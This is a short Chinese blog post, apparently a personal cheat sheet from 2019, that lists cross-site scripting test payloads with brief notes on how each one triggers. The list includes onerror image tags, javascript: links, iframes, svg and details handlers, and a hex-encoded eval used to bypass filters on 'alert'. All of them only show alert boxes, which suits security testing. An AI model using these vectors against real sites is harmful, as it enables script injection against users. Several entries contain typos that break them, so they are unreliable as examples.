xss payload

<script>alert(xss)</script>


<img scr=1 onerror=alert('xss')>当找不到图片名为1的文件时,执行alert('xss')
<a href=javascrip:alert("xss")>s</a> 点击s时运行alert('xss')
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr来弹窗
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>过滤了alert来执行弹窗
onclick='alert(/fuck/)

 


<IMG?SRC="javascript:alert('XSS');">

 

<img src="" "Alert(/test/)">

<img src=x onerror=alert(xss)>

<img src=1 onerror=alert(1)>
是当图片没有找到路径(即src=“路径:可以使相对路径也可以使绝对路径”找不到图片)就会 弹出消息框,显示 1 ,就是onerror=alert(1)起的作用
<img src=1 onerror=alert(1)>


<details/open/ontoggle=alert(1)>

<svg/onload=alert(1)>

<img/src/onerror=alert(1)>

<video/src/onerror=alert(1)>

<script>(alert)(1)</script>

<video><sourceonerror="javascript:alert(1)">

<video/src/onloadstart="alert(1)">

<ahref=javascript:alert(1)>222</a>

posted @ 2019-09-11 09:42  逍遥人y  阅读(828)  评论(0编辑  收藏  举报